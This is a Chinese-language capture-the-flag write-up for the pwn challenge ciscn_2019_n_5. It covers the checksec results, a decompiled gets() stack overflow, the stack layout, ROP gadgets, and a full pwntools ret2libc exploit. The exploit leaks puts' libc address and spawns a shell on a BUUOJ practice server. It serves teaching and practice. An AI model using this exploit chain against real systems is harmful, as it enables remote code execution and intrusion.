分析

  1. checksec
➜  pwn checksec --file=ciscn_2019_n_5
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX disabled No PIE No RPATH No RUNPATH 77) Symbols No 0 2 ciscn_2019_n_5
  1. ida
/*
 * Decompiled main() of ciscn_2019_n_5 (IDA pseudo-C, reproduced as-is).
 * `name` is not declared in this listing; it is defined outside main,
 * and its size is not visible here.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
char text[30]; // [rsp+0h] [rbp-20h] BYREF

setvbuf(stdout, 0LL, 2, 0LL); /* mode 2 = _IONBF on glibc: stdout is unbuffered */
puts("tell me your name");
read(0, name, 0x64uLL); /* reads up to 0x64 bytes into the externally declared `name` */
puts("wow~ nice name!");
puts("What do you want to say to me?");
gets(text); /* no length limit on a 30-byte stack buffer: this is the stack overflow; fgets(text, sizeof text, stdin) would bound the read */
return 0;
}

gets函数不检查输入长度，存在栈溢出；查看text在栈帧中的位置：

-0000000000000020 ; D/A/*   : change type (data/ascii/array)
-0000000000000020 ; N : rename
-0000000000000020 ; U : undefine
-0000000000000020 ; Use data definition commands to create local variables and function arguments.
-0000000000000020 ; Two special fields " r" and " s" represent return address and saved registers.
-0000000000000020 ; Frame size: 20; Saved regs: 8; Purge: 0
-0000000000000020 ;
-0000000000000020
-0000000000000020 text db 30 dup(?)
-0000000000000002 db ? ; undefined
-0000000000000001 db ? ; undefined
+0000000000000000 s db 8 dup(?)
+0000000000000008 r db 8 dup(?)
+0000000000000010
+0000000000000010 ; end of stack variables
  1. 在二进制中搜索system和/bin/sh，均未找到，只能自己构造（见下文ROP利用）

ROP利用

  1. pop|ret
➜  pwn ROPgadget --binary ciscn_2019_n_5 --only 'pop|ret'
Gadgets information
============================================================
0x000000000040070c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040070e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400710 : pop r14 ; pop r15 ; ret
0x0000000000400712 : pop r15 ; ret
0x000000000040070b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040070f : pop rbp ; pop r14 ; pop r15 ; ret
0x00000000004005a0 : pop rbp ; ret
0x0000000000400713 : pop rdi ; ret
0x0000000000400711 : pop rsi ; pop r15 ; ret
0x000000000040070d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004004c9 : ret
0x0000000000400532 : ret 0x200a
Unique gadgets found: 12
  • 0x0000000000400713 : pop rdi ; ret
  • 0x00000000004004c9 : ret
  1. main
pwndbg> info address main
Symbol "main" is a function at address 0x400636.
  • 0x400636 : main
  • 代码
# Exploit script for the ciscn_2019_n_5 practice target on BUUOJ, annotated
# with the evidence from the analysis above. Each hardening feature that
# checksec reports as missing removes a step of this chain: a stack canary
# would abort before the overwritten return address is used, and PIE would
# randomize the main/gadget addresses hard-coded below.
from pwn import *
from LibcSearcher import *
p = remote('node5.buuoj.cn',28140)
elf = ELF('./ciscn_2019_n_5')
# No PIE (checksec): the GOT and PLT slots live at fixed addresses. main()
# already called puts before the chain runs, so the GOT slot holds puts'
# libc address by then.
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
# main from `info address main`; gadgets from the ROPgadget listing above.
main = 0x400636
pop_rdi = 0x400713
ret = 0x4004c9
p.sendlineafter('tell me your name\n','aaa')
# IDA stack view: text is at rbp-0x20 and the saved rbp (s) occupies 8 bytes,
# so 0x28 bytes of padding reach the return address (r). gets() imposes no
# length limit and there is no canary to detect the overwrite.
# Chain 1: pop rdi <- puts_got ; puts ; main  -- prints puts' libc address,
# then re-enters main so a second input can be supplied.
buf = b'a'*0x28 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt)+ p64(main)
p.sendlineafter('What do you want to say to me?\n',buf)
# puts prints the address bytes up to the first NUL; a user-space x86-64
# address fits in 6 bytes, so ljust pads it back to 8 for u64.
puts_addr = u64(p.recv(6).ljust(8,b'\x00'))
print(hex(puts_addr))
# LibcSearcher matches the remote libc from the leaked puts offset;
# libc_base = leaked address - symbol offset, then system and "/bin/sh"
# are rebased from the same library.
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
sh = libc_base + libc.dump('str_bin_sh')
p.sendlineafter('tell me your name\n','aaa')
# Chain 2: pop rdi <- "/bin/sh" ; ret ; system. The extra `ret` gadget is
# presumably stack-alignment padding before entering system; the page does
# not state why it is included.
buf = b'a' * 0x28 + p64(pop_rdi) + p64(sh) + p64(ret) + p64(system)
p.sendline(buf)
p.interactive()